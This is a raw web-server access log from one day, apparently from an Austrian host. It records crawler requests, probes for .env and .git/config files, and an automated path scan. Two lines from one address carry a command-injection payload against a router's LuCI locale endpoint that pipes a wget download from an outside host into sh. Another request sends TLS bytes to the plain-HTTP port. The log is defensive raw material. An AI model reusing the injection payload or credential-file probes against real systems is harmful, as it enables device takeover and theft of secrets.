156.59.198.135 - - [22/Dec/2024:12:15:49 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908291203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Dec/2024:12:19:50 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/toolbar%20quick%20mode.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:12:23:50 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00005.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
63.141.246.226 - - [22/Dec/2024:12:25:46 +0100] "GET /nacos/v1/console/namespaces HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
93.174.93.12 - - [22/Dec/2024:12:27:36 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.135 - - [22/Dec/2024:12:27:51 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111261503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.7.214.89 - - [22/Dec/2024:12:31:25 +0100] "\x03" 400 383 "-" "-"
156.59.198.136 - - [22/Dec/2024:12:31:50 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009111203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.53.204 - - [22/Dec/2024:12:35:50 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.110.177 - - [22/Dec/2024:12:39:50 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
104.219.238.219 - - [22/Dec/2024:12:41:36 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
104.219.238.219 - - [22/Dec/2024:12:41:36 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
92.255.57.58 - - [22/Dec/2024:12:42:59 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
202.112.47.148 - - [22/Dec/2024:12:43:40 +0100] "GET /wHWF HTTP/1.1" 404 281 "-" "Go-http-client/1.1"
47.128.53.31 - - [22/Dec/2024:12:43:51 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Dec/2024:12:47:50 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908131003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.67 - - [22/Dec/2024:12:51:51 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.180.140.4 - - [22/Dec/2024:13:05:49 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
141.98.11.129 - - [22/Dec/2024:13:08:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [22/Dec/2024:13:09:16 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [22/Dec/2024:13:17:24 +0100] "GET /renault.2web.at/stats/lang/awstats-pl.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
79.143.20.2 - - [22/Dec/2024:13:20:10 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.136 - - [22/Dec/2024:13:21:24 +0100] "GET /renault.2web.at/stats/lang/awstats-jp.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
79.143.20.2 - - [22/Dec/2024:13:23:04 +0100] "\x16\x03\x01" 400 383 "-" "-"
95.214.53.205 - - [22/Dec/2024:13:24:34 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [22/Dec/2024:13:25:24 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911291603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.115.34 - - [22/Dec/2024:13:26:48 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
79.143.20.2 - - [22/Dec/2024:13:27:42 +0100] "GET //admin/config.php HTTP/1.1" 404 289 "-" "python-requests/2.27.1"
156.59.198.136 - - [22/Dec/2024:13:29:25 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909241003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:13:33:25 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00006.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.32 - - [22/Dec/2024:13:45:50 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.191.126.213 - - [22/Dec/2024:13:51:26 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [22/Dec/2024:14:00:07 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/palb.png HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.79 - - [22/Dec/2024:14:16:12 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.148.10.205 - - [22/Dec/2024:14:19:48 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Linux; Android 9; SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
45.148.10.205 - - [22/Dec/2024:14:20:27 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3191.0 Safari/537.36"
31.220.1.144 - - [22/Dec/2024:14:27:34 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
95.214.55.32 - - [22/Dec/2024:15:05:24 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
87.120.125.126 - - [22/Dec/2024:15:12:52 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7"
95.214.53.205 - - [22/Dec/2024:15:36:18 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
31.220.1.144 - - [22/Dec/2024:15:44:26 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
45.58.159.234 - - [22/Dec/2024:15:54:30 +0100] "\x16\x03\x01" 400 383 "-" "-"
45.58.159.234 - - [22/Dec/2024:15:54:30 +0100] "\x16\x03\x01" 400 383 "-" "-"
45.58.159.234 - - [22/Dec/2024:15:54:30 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.159.234 - - [22/Dec/2024:15:54:30 +0100] "GET /form.html HTTP/1.1" 404 283 "-" "curl/8.1.2"
45.58.159.234 - - [22/Dec/2024:15:54:30 +0100] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0"
45.58.159.234 - - [22/Dec/2024:15:54:30 +0100] "GET /t4 HTTP/1.1" 404 278 "-" "Mozilla/5.0"
45.58.159.234 - - [22/Dec/2024:15:54:30 +0100] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.159.234 - - [22/Dec/2024:15:54:30 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.159.234 - - [22/Dec/2024:15:54:30 +0100] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.159.234 - - [22/Dec/2024:15:54:30 +0100] "GET /systembc/password.php HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.159.234 - - [22/Dec/2024:15:54:30 +0100] "GET /password.php HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
156.59.198.135 - - [22/Dec/2024:16:01:04 +0100] "GET /renault.2web.at/stats/lang/awstats-th.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:16:05:04 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00012.pdf HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:16:09:04 +0100] "GET /docs/contadino/2018/AUFTRAG/AB18-00006.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:16:13:05 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006051003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
34.77.49.75 - - [22/Dec/2024:16:16:10 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
156.59.198.135 - - [22/Dec/2024:16:17:05 +0100] "GET /docs/contadino/ANGEBOT/AG17-000005.pdf HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:16:21:06 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202007081403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.156.128.131 - - [22/Dec/2024:16:21:49 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.45 - - [22/Dec/2024:16:22:04 +0100] "GET /css/images/PTZOptics_powerby.png HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.191.126.213 - - [22/Dec/2024:16:22:23 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
104.28.213.2 - - [22/Dec/2024:16:32:53 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
172.168.40.208 - - [22/Dec/2024:16:35:18 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
95.214.55.43 - - [22/Dec/2024:16:36:56 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [22/Dec/2024:16:41:07 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00020.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:16:45:08 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008191203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /.git/HEAD HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /indice.jhtml HTTP/1.1" 404 372 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /Portal/Portal.mwsl HTTP/1.1" 404 378 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "POST /scripts/WPnBr.dll HTTP/1.1" 404 377 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /nmaplowercheck1734877665 HTTP/1.1" 404 384 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /webui HTTP/1.1" 404 365 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /server-status HTTP/1.1" 403 377 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /home.cfm HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /HNAP1 HTTP/1.1" 404 365 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET / HTTP/1.1" 200 423 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /docs/cplugError.html/ HTTP/1.1" 404 381 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET / HTTP/1.1" 200 423 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 3810 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /default.jsa HTTP/1.1" 404 371 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /owa/ HTTP/1.1" 404 364 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "POST /sdk HTTP/1.1" 404 363 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 13229 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /owa/ HTTP/1.1" 404 364 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /menu.aspx HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /webui HTTP/1.1" 404 365 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:19 +0100] "GET /LBma HTTP/1.1" 404 364 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /main.shtml HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /user HTTP/1.1" 404 364 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 404 375 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /user HTTP/1.1" 404 364 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /home.asp HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /rest/applinks/1.0/manifest HTTP/1.1" 404 386 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /pools/default/buckets HTTP/1.1" 404 381 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /Portal0000.htm HTTP/1.1" 404 374 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET / HTTP/1.1" 200 423 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /human.aspx?arg12=infotech HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /admin.jsp HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /pools HTTP/1.1" 404 365 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /confluence/rest/applinks/1.0/manifest HTTP/1.1" 404 397 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /__Additional HTTP/1.1" 404 372 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET / HTTP/1.1" 200 423 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /human.aspx?arg12=infotech HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /indice.shtml HTTP/1.1" 404 372 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /default.jhtml HTTP/1.1" 404 373 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1" 404 399 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:20 +0100] "GET /readme.txt HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:21 +0100] "GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1" 404 386 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:21 +0100] "GET /index.cgi HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:21 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 378 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:21 +0100] "GET /default.cfm HTTP/1.1" 404 371 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:21 +0100] "GET /CFIDE/componentutils/ HTTP/1.1" 404 381 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:21 +0100] "GET /default.jsp HTTP/1.1" 404 371 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:21 +0100] "GET /geoserver/index.html HTTP/1.1" 404 380 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:21 +0100] "GET /index.jsp HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /admin.pl HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /geoserver/ HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage HTTP/1.1" 404 430 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /admin.php HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage HTTP/1.1" 404 430 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /admin.jsa HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /Account/Login HTTP/1.1" 404 373 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /admin.aspx HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /indice.html HTTP/1.1" 404 371 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /cgi-bin/info.cgi HTTP/1.1" 404 376 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /start.jsp HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /xml/info.xml HTTP/1.1" 404 372 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /menu.asp HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:22 +0100] "GET /magento_version HTTP/1.1" 404 375 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /api/v1/check-version HTTP/1.1" 404 380 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /localstart.html HTTP/1.1" 404 375 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /fog/management/index.php?node=client&sub=logininfo HTTP/1.1" 404 384 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /inicio.cfm HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1" 404 392 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /menu.cgi HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /admin.cgi HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /cluster/list.query HTTP/1.1" 404 378 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /apps/zxtm/login.cgi HTTP/1.1" 404 379 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /localstart.jhtml HTTP/1.1" 404 376 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /api/server/version HTTP/1.1" 404 378 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /index.asp HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /menu.jsa HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:23 +0100] "GET /administrator/manifests/files/joomla.xml HTTP/1.1" 404 400 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:24 +0100] "GET default.asp HTTP/1.1" 400 388 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:24 +0100] "GET /language/en-GB/en-GB.xml HTTP/1.1" 404 384 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:24 +0100] "GET /admin.cfm HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:24 +0100] "GET /versa/login HTTP/1.1" 404 371 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:24 +0100] "GET /home.jhtml HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:24 +0100] "GET /login.html HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:24 +0100] "GET /start.html HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:24 +0100] "GET /base.jsa HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:24 +0100] "GET /start.pl HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:25 +0100] "GET /base.shtml HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:25 +0100] "GET /base.pl HTTP/1.1" 404 367 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:25 +0100] "GET /base.php HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:25 +0100] "GET /default.php HTTP/1.1" 404 371 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:25 +0100] "GET /start.cgi HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:25 +0100] "GET /indice.asp HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:26 +0100] "GET /admin.asp HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:26 +0100] "GET /inicio.aspx HTTP/1.1" 404 371 "-" "curl/7.54.0"
